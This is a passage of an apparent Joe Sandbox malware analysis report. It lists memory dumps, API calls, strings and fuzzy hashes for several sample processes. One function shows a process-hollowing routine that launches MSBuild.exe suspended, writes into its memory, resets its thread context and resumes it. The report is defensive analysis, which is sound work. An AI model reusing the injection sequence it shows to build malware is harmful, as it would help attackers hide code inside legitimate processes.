Associated: 00000003.00000002.1533199223.0000000000B7F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533222579.0000000000B80000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533249817.0000000000B88000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533278740.0000000000B89000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533278740.0000000000BC9000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533361386.0000000000BDE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533396199.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533424171.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533454868.0000000000BF4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533489943.0000000000BF5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533515592.0000000000BFC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533543676.0000000000C0B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533571210.0000000000C0C000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_900000_skotes.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: +ax4$+ax4
API String ID: 2659868963-1991603365
Opcode ID: 3f606773e1ec0867c6d22f1161339e02a12a1592cf8669b071bb1089726ef081
Instruction ID: 6a8ac5bbd0c209f855d734d4c23d14d4d0400dd249bdcf894b73785f92a6c8c8
Opcode Fuzzy Hash: 3f606773e1ec0867c6d22f1161339e02a12a1592cf8669b071bb1089726ef081
Instruction Fuzzy Hash: D831F5B1A10209AFC710DF58C844B8EFBF9FF89320F14861AF814A7780E770A944CBA0

Function 00902B30 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00902B63

Strings

+ax4, xrefs: 00902B36
This function cannot be called on a default constructed task, xrefs: 00902B43

Memory Dump Source

Source File: 00000003.00000002.1530404067.0000000000901000.00000040.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000003.00000002.1530077629.0000000000900000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530404067.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530727548.0000000000969000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530766040.000000000096B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530801626.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531725930.0000000000AC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531831280.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531878501.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531878501.0000000000AE8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532331923.0000000000AF1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532436211.0000000000AF2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532489546.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532518977.0000000000B00000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532547585.0000000000B01000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532577868.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532605363.0000000000B03000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532635329.0000000000B04000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532671862.0000000000B18000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532699440.0000000000B19000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532743572.0000000000B1C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532788863.0000000000B2E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532826407.0000000000B44000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532857999.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532890478.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532922295.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532959513.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532989434.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533018188.0000000000B67000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533046843.0000000000B6A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533068917.0000000000B6B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533099773.0000000000B6E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533132016.0000000000B76000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533161308.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533199223.0000000000B7F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533222579.0000000000B80000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533249817.0000000000B88000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533278740.0000000000B89000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533278740.0000000000BC9000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533361386.0000000000BDE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533396199.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533424171.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533454868.0000000000BF4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533489943.0000000000BF5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533515592.0000000000BFC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533543676.0000000000C0B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533571210.0000000000C0C000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_900000_skotes.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: +ax4$This function cannot be called on a default constructed task
API String ID: 2659868963-500965450
Opcode ID: 03a163284f9a3108b12398acb6362d9535272b2040b3c3b68b047ba6ca98840f
Instruction ID: 379cac1943f50ee412b2524de8ba3f6f862ae9f5bc23f301649f9ba804bf4dcc
Opcode Fuzzy Hash: 03a163284f9a3108b12398acb6362d9535272b2040b3c3b68b047ba6ca98840f
Instruction Fuzzy Hash: F3F08271D2030C9BC720DF69984169EBBE9AF55300F1042AEF84067300EBB01A588B95

Analysis Process: 4ec75545d6.exePID: 4568, Parent PID: 5480COMMON

Executed Functions

Function 004C92CC Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,?,?), ref: 004C9314

Part of subcall function 004C9098: VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 004C90C1
Part of subcall function 004C9098: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 004C926D

VirtualAlloc.KERNELBASE(00000000,00400000,00001000,00000004), ref: 004C9366
VirtualProtect.KERNELBASE(0000002C,?,00000040,0000002C), ref: 004C93C0
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 004C93F3

Strings

,, xrefs: 004C9344

Memory Dump Source

Source File: 00000007.00000003.1718070471.00000000004C9000.00000040.00000001.01000000.0000000A.sdmp, Offset: 004C9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_3_4c9000_4ec75545d6.jbxd

Similarity

API ID: Virtual$Alloc$Free$Protect
String ID: ,
API String ID: 1004437363-3772416878
Opcode ID: 846e80d9192284de11e110977aaee4205ca63ec1a267e246cbf1a7208dcc7df3
Instruction ID: 18bbba539436acdd67bdcd3e0c5253ed6ee0269a392362c31ec4d10e78ce73cf
Opcode Fuzzy Hash: 846e80d9192284de11e110977aaee4205ca63ec1a267e246cbf1a7208dcc7df3
Instruction Fuzzy Hash: 1751E879900609AFCB50DFA9C885F9EBBB4FF08344F10851EF959A7280D374E951CBA8

Function 004C9098 Relevance: 2.7, APIs: 2, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 004C90C1
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 004C926D

Memory Dump Source

Source File: 00000007.00000003.1718070471.00000000004C9000.00000040.00000001.01000000.0000000A.sdmp, Offset: 004C9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_3_4c9000_4ec75545d6.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
Instruction ID: 97c640f8b929d46a116a5da3cca0a854b9ecad40ab7f6a57cf6e5e1ec65ffdff
Opcode Fuzzy Hash: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
Instruction Fuzzy Hash: 4371B175D0424AEFDB41CF98C485BEEBBF0AF09314F28449AE455F7241C638AA41DF65

Analysis Process: svchost.exePID: 1008, Parent PID: 5196COMMON

Executed Functions

Function 00A702D8 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 169memoryfileCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,?,?), ref: 00A70326

Part of subcall function 00A700A4: VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 00A700CD
Part of subcall function 00A700A4: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00A70279

VirtualAlloc.KERNELBASE(00000000,00400000,00001000,00000004), ref: 00A70378
VirtualProtect.KERNELBASE(0000002C,?,00000040,?), ref: 00A703E7
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00A70407
MapViewOfFile.KERNELBASE(?,00000004,00000000,00000000,00000000), ref: 00A7042E
VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 00A70456
CloseHandle.KERNELBASE(?), ref: 00A70471

Strings

,, xrefs: 00A70356

Memory Dump Source

Source File: 00000008.00000003.1721572291.0000000000A70000.00000040.00000001.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_3_a70000_svchost.jbxd

Similarity

API ID: Virtual$Alloc$Free$CloseFileHandleProtectView
String ID: ,
API String ID: 3867569247-3772416878
Opcode ID: 35eb397ea14406336b01ea38f36e06f8461e94550e7b98cd084062937234d485
Instruction ID: 40e1616238215c862215f6aa8c3809ed34c9a4d3f757940fc45a28f0bd515729
Opcode Fuzzy Hash: 35eb397ea14406336b01ea38f36e06f8461e94550e7b98cd084062937234d485
Instruction Fuzzy Hash: 3461DAB5900209EFDB20DFA5CD84E9EBBB9FF08354F14C529FA59A7241D770A981CB60

Function 00A700A4 Relevance: 2.7, APIs: 2, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 00A700CD
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00A70279

Memory Dump Source

Source File: 00000008.00000003.1721572291.0000000000A70000.00000040.00000001.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_3_a70000_svchost.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
Instruction ID: e5cf20bdbd0b078f1652e230bebb3dc48bd4958c88c65edcc79bc922e83dc929
Opcode Fuzzy Hash: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
Instruction Fuzzy Hash: 9A71AB72E0424ADFDB41CF98C895BEDBBF0AF19314F248095E569FB241C234AA91DF64

Analysis Process: 3a1a782de7.exePID: 5232, Parent PID: 5480COMMON

Execution Graph

Execution Coverage:	4.4%
Dynamic/Decrypted Code Coverage:	0.6%
Signature Coverage:	0.9%
Total number of Nodes:	2000
Total number of Limit Nodes:	22

Executed Functions

Function 0032519E Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 295
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00325110,00325100), ref: 00325334
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00325347
Wow64GetThreadContext.KERNEL32(00000118,00000000), ref: 00325365
ReadProcessMemory.KERNELBASE(0000011C,?,00325154,00000004,00000000), ref: 00325389
VirtualAllocEx.KERNELBASE(0000011C,?,?,00003000,00000040), ref: 003253B4
WriteProcessMemory.KERNELBASE(0000011C,00000000,?,?,00000000,?), ref: 0032540C
WriteProcessMemory.KERNELBASE(0000011C,00400000,?,?,00000000,?,00000028), ref: 00325457
WriteProcessMemory.KERNELBASE(0000011C,?,?,00000004,00000000), ref: 00325495
Wow64SetThreadContext.KERNEL32(00000118,002D0000), ref: 003254D1
ResumeThread.KERNELBASE(00000118), ref: 003254E0

Strings

CreateProcessW, xrefs: 00325250
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, xrefs: 00325333
ReadProcessMemory, xrefs: 00325289
SetThreadContext, xrefs: 003252C2
Load, xrefs: 003251DA
VirtualAllocEx, xrefs: 0032529C
TerminateProcess, xrefs: 003253C3
aryA, xrefs: 003251E2
ress, xrefs: 00325226
GetThreadContext, xrefs: 00325276
WriteProcessMemory, xrefs: 003252AF
ResumeThread, xrefs: 003252D8
VirtualAlloc, xrefs: 00325263
GetP, xrefs: 0032521E

Memory Dump Source

Source File: 0000000C.00000002.1803443974.0000000000325000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000C.00000002.1801333230.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1801442722.0000000000301000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803017987.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804090278.0000000000326000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804791319.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804961880.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1805495616.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300000_3a1a782de7.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2687962208-3857624555
Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
Instruction ID: c5a70a792c846ba504cf814761ba99cf83e94304f0d4165fc2e1d268d8a2ab30
Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
Instruction Fuzzy Hash: 48B1087664064AAFDB60CF68CC80BDAB3A5FF88714F158524EA0CAB341D774FA51CB94

Function 00301614 Relevance: 9.2, APIs: 6, Instructions: 171
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00301098: _strlen.LIBCMT ref: 003010F9

CreateFileA.KERNELBASE ref: 00301675
GetFileSize.KERNEL32(00000000,00000000), ref: 00301685
ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 003016AB
CloseHandle.KERNELBASE(00000000), ref: 003016BA
_strlen.LIBCMT ref: 00301705
CloseHandle.KERNEL32(00000000), ref: 00301805

Memory Dump Source

Source File: 0000000C.00000002.1801442722.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000C.00000002.1801333230.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803017987.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803443974.0000000000325000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804090278.0000000000326000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804791319.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804961880.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1805495616.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300000_3a1a782de7.jbxd

Similarity

API ID: File$CloseHandle_strlen$CreateReadSize
String ID:
API String ID: 2911764282-0
Opcode ID: 8b3929855cba5fce51b4a26e0909167e9dfcea4390266b20fc9874f326387001
Instruction ID: 64baef71fdb7621e0e4bbb48feede0941d9794c3188d0f886d81ff5eddb8b96e
Opcode Fuzzy Hash: 8b3929855cba5fce51b4a26e0909167e9dfcea4390266b20fc9874f326387001
Instruction Fuzzy Hash: 1F51F1B19063409BC712EF24CC95B2BB7E9FF89704F154A2DF8899B291E734EA44C752

Function 0030123B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 85
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL(00000000,00000000,00000000), ref: 003012C7

Strings

Fju, xrefs: 003012C7
[+], xrefs: 003012E1

Memory Dump Source

Source File: 0000000C.00000002.1801442722.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000C.00000002.1801333230.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803017987.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803443974.0000000000325000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804090278.0000000000326000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804791319.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804961880.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1805495616.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300000_3a1a782de7.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID: [+]$Fju
API String ID: 6842923-117220630
Opcode ID: 57e315e2c92112cd5ab4968b277caad5a0ad983d86b684d1331570d6f1752e45
Instruction ID: 9cb37e48b8282404601ed0f0284a95619261fb048945735c5e749cf8d0720b94
Opcode Fuzzy Hash: 57e315e2c92112cd5ab4968b277caad5a0ad983d86b684d1331570d6f1752e45
Instruction Fuzzy Hash: 2531273550D3804BD727AB38A8997EBBBD4AFAE318F19097CD8C987283C2615446C762

Function 0030155C Relevance: 4.6, APIs: 3, Instructions: 64
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00301098: _strlen.LIBCMT ref: 003010F9

FreeConsole.KERNELBASE ref: 0030158B

Part of subcall function 0030123B: KiUserExceptionDispatcher.NTDLL(00000000,00000000,00000000), ref: 003012C7

VirtualProtect.KERNELBASE(00325011,00000549,00000040,?), ref: 003015D7
ExitProcess.KERNEL32 ref: 0030160E

Memory Dump Source

Source File: 0000000C.00000002.1801442722.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000C.00000002.1801333230.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803017987.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803443974.0000000000325000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804090278.0000000000326000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804791319.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804961880.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1805495616.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300000_3a1a782de7.jbxd

Similarity

API ID: ConsoleDispatcherExceptionExitFreeProcessProtectUserVirtual_strlen
String ID:
API String ID: 2898289550-0
Opcode ID: 13538bbfb3b32e94153513b1f27ebd717161b582013839fc3992557b24eb7188
Instruction ID: f8ed5cac6a75bbb2e8fecaaee6bbef6f28a6b24dda89aba3dcd82f004145e0bd
Opcode Fuzzy Hash: 13538bbfb3b32e94153513b1f27ebd717161b582013839fc3992557b24eb7188
Instruction Fuzzy Hash: C611E372A01108ABEB02AB65AC52FFF736CEF85700F408029F508AB2C1E6759E1147E1

Function 00315283 Relevance: 3.2, APIs: 2, Instructions: 196
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0031562D: GetConsoleOutputCP.KERNEL32(375543C4,00000000,00000000,?), ref: 00315690

WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,0030BBF3,?), ref: 00315408
GetLastError.KERNEL32(?,?,0030BBF3,?,0030BE37,00000000,?,00000000,0030BE37,?,?,?,00324628,0000002C,0030BD23,?), ref: 00315412

Memory Dump Source

Source File: 0000000C.00000002.1801442722.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000C.00000002.1801333230.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803017987.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803443974.0000000000325000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804090278.0000000000326000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804791319.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804961880.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1805495616.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300000_3a1a782de7.jbxd

Similarity

API ID: ConsoleErrorFileLastOutputWrite
String ID:
API String ID: 2915228174-0
Opcode ID: 97b439dd4673a01f5ff15d11d12f5db18531760eaa81afe07af57bf767a2bfef
Instruction ID: 601d8881b57d243e6623d53f0cfb59a7e97c01feb22795b245afec68f047786a
Opcode Fuzzy Hash: 97b439dd4673a01f5ff15d11d12f5db18531760eaa81afe07af57bf767a2bfef
Instruction Fuzzy Hash: A961E571D00509EFDF1ACFA8C845AEEBBB9AF9D304F150559E810AB251D771DA82CB60

Function 00315A5C Relevance: 3.1, APIs: 2, Instructions: 80
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,003153EE,00000000,0030BE37,?,00000000,?,00000000), ref: 00315AF8
GetLastError.KERNEL32(?,003153EE,00000000,0030BE37,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,0030BBF3), ref: 00315B1E

Memory Dump Source

Source File: 0000000C.00000002.1801442722.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000C.00000002.1801333230.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803017987.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803443974.0000000000325000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804090278.0000000000326000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804791319.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804961880.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1805495616.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300000_3a1a782de7.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: af6d33a5c608b9730daee818d97177a555fd11af0f3fb92bfbb4b63a31367e0c
Instruction ID: 6400fcded5e79f7d6849c1b6103aac9930a595e21cfde695f0d897f17522ddaf
Opcode Fuzzy Hash: af6d33a5c608b9730daee818d97177a555fd11af0f3fb92bfbb4b63a31367e0c
Instruction Fuzzy Hash: 41216031A11619DFCB1ACF29DD909E9B7B9EF8D301F2441A9E906D7251D730AE82CB60

Function 0030FF89 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,?,00000000,0030FE78,00324948), ref: 0030FFD5
GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,0030FE78,00324948), ref: 0030FFE7

Memory Dump Source

Source File: 0000000C.00000002.1801442722.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000C.00000002.1801333230.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803017987.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803443974.0000000000325000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804090278.0000000000326000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804791319.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804961880.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1805495616.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300000_3a1a782de7.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 208237c68aeeb91f9396cd9b417048109f6643cd105aa631aaa54b23054f973b
Instruction ID: 7ddf036f0c8518477c4262e3f6afe6dd723ef838a031c69f293c4e156066cf73
Opcode Fuzzy Hash: 208237c68aeeb91f9396cd9b417048109f6643cd105aa631aaa54b23054f973b
Instruction Fuzzy Hash: C511E171204B424AC73A4A3E9D98762BA99AB5F330F39072ED1B2C29F1C270C9C2C241

Function 0030136E Relevance: 1.7, APIs: 1, Instructions: 157
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_strlen.LIBCMT ref: 00301388

Memory Dump Source

Source File: 0000000C.00000002.1801442722.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000C.00000002.1801333230.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803017987.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803443974.0000000000325000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804090278.0000000000326000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804791319.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804961880.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1805495616.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300000_3a1a782de7.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: a6e8bc42482da3edde67a03c0f48bb48c5d44e5488764de2fae6303764f2f884
